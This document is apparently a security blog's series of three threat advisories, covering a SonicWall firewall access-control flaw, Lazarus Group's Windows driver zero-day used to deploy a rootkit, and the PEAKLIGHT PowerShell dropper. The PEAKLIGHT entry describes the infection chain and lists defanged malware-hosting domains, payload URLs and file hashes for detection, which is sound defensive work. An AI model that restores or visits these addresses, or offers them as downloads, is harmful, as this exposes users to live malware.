Critical Vulnerability in SonicWall Firewalls Allows Unauthorized Access

by jdpoteet | Aug 29, 2024 | Threat Advisories

Summary

SonicWall issued patches for a critical vulnerability (CVE-2024-40766) affecting its firewalls.  The flaw could allow unauthorized access and potentially crash the device if exploited.

Risk Score

 CVE-ID                                 CVSSv3

CVE-2024-40766                9.3

VULNERABILITY DETAILS

This critical CVE-2024-40766 could lead to unauthorized access to the devices. This vulnerability stems from improper access control within the SonicOS management interface, potentially leading to unauthorized resource access and, under specific conditions, causing the firewall to crash.

The vulnerability severity score is 9.3, due to its network-based attack vector, low attack complexity, and the fact that it requires neither authentication nor user interaction to be exploited.

AFFECTED PRODUCTS

• SonicWall Firewall Gen 5 devices (SOHO): 5.9.2.14-12o and older versions
• SonicWall Firewall Gen 6 devices: 6.5.4.14-109n and older versions
• SonicWall Firewall Gen 7 devices running SonicOS 7.0.1-5035 and earlier versions

RECOMMENDATIONS

• Apply the latest security patches released by SonicWall.
  • SOHO (Gen 5 Firewalls) – 5.9.2.14-13o
  • Gen 6 Firewalls – 6.5.2.8-2n (for SM9800, NSsp 12400, and NSsp 12800)
  • Gen 6 Firewalls – 6.5.4.15.116n (for other Gen 6 Firewall appliances)
  • Note: Any SonicOS version higher than 7.0.1-5035 for Gen 7 devices. (This vulnerability is not reproducible in SonicOS firmware version higher than 7.0.1-5035. However, SonicWall recommends to install the latest firmware.)
• If immediate patching is not possible, restrict firewall management access to trusted sources.
• Disable firewall WAN management access from internet sources as an additional precaution.
• Keep an eye on firewall logs and monitor for any unusual access attempts or crashes

REFERENCES

• https://thehackernews.com/2024/08/sonicwall-issues-critical-patch-for.html
• https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015
• https://nvd.nist.gov/vuln/detail/CVE-2024-40766
• https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-critical-access-control-flaw-in-sonicos/
• https://www.helpnetsecurity.com/2024/08/26/cve-2024-40766/

Lazarus Group Exploits Windows Driver Zero-Day to Deploy Rootkit

by jdpoteet | Aug 28, 2024 | Threat Advisories

SUMMARY

The Lazarus hacking group exploited a zero-day vulnerability in the Windows AFD.sys driver (CVE-2024-38193) to elevate privileges and install the FUDModule rootkit. This vulnerability, patched in August 2024, allowed attackers to evade detection by disabling Windows monitoring features. The flaw was used in a targeted campaign, potentially linked to attacks on Brazilian cryptocurrency professionals.

TECHNICAL DETAILS

The Lazarus hacking group is infamous for large-scale cyberheists targeting financial and cryptocurrency firms to fund North Korea’s weapons programs. In 2022, the US linked them to a $617 million cryptocurrency theft from Axie Infinity and offers up to $5 million for information on their activities.

The notorious North Korean Lazarus hacking group leveraged the zero-day flaw in the Windows Ancillary Function Driver for WinSock (AFD.sys), identified as CVE-2024-38193, to execute a Bring Your Own Vulnerable Driver (BYOVD) attack. This vulnerability allowed them to gain kernel-level privileges, enabling the installation of the FUDModule rootkit, which is designed to evade detection by disabling Windows monitoring mechanisms. The AFD.sys driver, a default component on all Windows devices, made this attack particularly dangerous, as it required no additional vulnerable drivers that could be easily blocked or detected by Windows.

The attack was uncovered by Gen Digital researchers in June 2024 and is believed to be connected to a larger campaign in Brazil, where North Korean hackers, identified as PUKCHONG (UNC4899), targeted cryptocurrency professionals. The attackers used social engineering tactics, including fake job opportunities, to deliver a trojanized Python application that ultimately led to the installation of malware.

The AFD.sys vulnerability was one of several zero-day flaws patched by Microsoft in August 2024. The Lazarus group has a history of exploiting similar vulnerabilities, including the Windows appid.sys and Dell dbutil_2_3.sys kernel drivers, to install the FUDModule rootkit in previous BYOVD attacks.

INDICATORS OF COMPROMISE (IOCs)

AVAST’s IOC Github has a YARA module – ioc/FudModule at master · avast/ioc · GitHub

RECOMMENDATIONS

• Ensure all systems are updated with the latest security patches, including the August 2024 Patch Tuesday update.
• Implement advanced monitoring solutions to detect unusual behavior related to drivers and kernel-level activities.
• Maintain strict control over driver installations, allowing only trusted and verified drivers.
• Employ endpoint protection solutions that can block the execution of known vulnerable drivers.
• Utilize application whitelisting to prevent unapproved executables, including vulnerable drivers, from running.
• Segment networks to limit the impact of any potential breaches, reducing the attack surface available to threat actors.
• Conduct regular security awareness training to ensure employees are aware of the latest phishing and social engineering tactics used by groups like Lazarus.

REFERENCES

• https://thehackernews.com/2024/08/microsoft-patches-zero-day-flaw.html
• https://www.bleepingcomputer.com/news/microsoft/windows-driver-zero-day-exploited-by-lazarus-hackers-to-install-rootkit/
• https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/
• https://www.rapid7.com/db/vulnerabilities/msft-cve-2024-38193/

PEAKLIGHT Dropper Exploits Windows Systems via Pirated Movie Downloads to Deliver Malware

by jdpoteet | Aug 27, 2024 | Threat Advisories

SUMMARY

A novel dropper that launches PowerShell-based malware to infect Windows systems has been identified, which is distributed through pirated movie downloads. The dropper delivers various malware strains, including Lumma Stealer and CryptBot, via a multi-stage attack chain.

TECHNICAL DETAILS

Mandiant identified the dropper that delivers various malware strains, including Lumma Stealer, Hijack Loader, and CryptBot, by leveraging a memory-only PowerShell-based downloader known as PEAKLIGHT. The attack starts when users download a Windows shortcut (LNK) file disguised as a pirated movie via drive-by downloads.

The LNK file, hidden within a ZIP archive, connects to a content delivery network (CDN) hosting an obfuscated JavaScript dropper. This dropper then runs the PEAKLIGHT PowerShell script, which contacts a command-and-control (C2) server to retrieve and execute additional malware payloads. The dropper is also capable of embedding hex-encoded and Base64-encoded PowerShell payloads, which are unpacked to deploy the malware.

Mandiant noted that this method has been used in various attack chains, with LNK files using wildcards to trigger the execution of the mshta.exe binary, discreetly running the malicious code.

INFECTION CHAIN
(Source: Mandiant)

INDICATORS OF COMPROMISE (IOCs)

Domains:

• relaxtionflouwerwi[.]shop
• deprivedrinkyfaiir[.]shop
• detailbaconroollyws[.]shop
• messtimetabledkolvk[.]shop
• considerrycurrentyws[.]shop
• understanndtytonyguw[.]shop
• patternapplauderw[.]shop
• horsedwollfedrwos[.]shop
• tropicalironexpressiw[.]shop

URLs:

• hxxp://gceight8vt[.]top/upload.php
• hxxps://brewdogebar[.]com/code.vue
• hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk
• hxxps://fatodex.b-cdn[.]net/K1.zip
• hxxps://fatodex.b-cdn[.]net/K2.zip
• hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
• hxxps://matodown.b-cdn[.]net/K1.zip
• hxxps://matodown.b-cdn[.]net/K2.zip
• hxxps://nextomax.b-cdn[.]net/L1.zip
• hxxps://nextomax.b-cdn[.]net/L2.zip
• hxxps://potexo.b-cdn[.]net/K1.zip
• hxxps://potexo.b-cdn[.]net/K2.zip
• hxxps://fatodex.b-cdn[.]net/fatodex
• hxxps://matodown.b-cdn[.]net/matodown
• hxxps://potexo.b-cdn[.]net/potexo

MD5:

CRYPTBOT:

• erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
• zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
• Sеexe (MD5: d8e21ac76b228ec144217d1e85df2693)

LUMMAC.V2:

• oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4)
• dll (MD5: 58c4ba9385139785e9700898cb097538)

PEAKLIGHT:

• Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)
• Downloader (MD5: b716a1d24c05c6adee11ca7388b728d3)

SHADOWLADDER:

• exe (MD5: b15bac961f62448c872e1dc6d3931016)
• cfg (MD5: e7c43dc3ec4360374043b872f934ec9e)
• doc (MD5: f98e0d9599d40ed032ff16de242987ca)
• zip (MD5: b6b8164feca728db02e6b636162a2960)
• zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1)
• zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a)
• zip (MD5: d7aff07e7cd20a5419f2411f6330f530)
• zip (MD5: a6c4d2072961e9a8c98712c46be588f8)
• dll (MD5: 059d94e8944eca4056e92d60f7044f14)
• txt (MD5: dfdc331e575dae6660d6ed3c03d214bd)
• dll (MD5: 47eee41b822d953c47434377006e01fe)

RECOMMENDATIONS

• Do not download pirated content or software from untrusted sources.
• Ensure that antivirus and anti-malware solutions are current and capable of detecting PowerShell-based threats.
• Monitor for unusual activities such as the execution of mshta.exe or unexpected network connections to CDN sites.
• Implement security measures that can detect and block obfuscated scripts and LNK file-based attacks.
• Educate users about the risks associated with downloading files from unreliable websites, especially those offering pirated content.

REFERENCES

• https://thehackernews.com/2024/08/new-peaklight-dropper-deployed-in.html
• https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/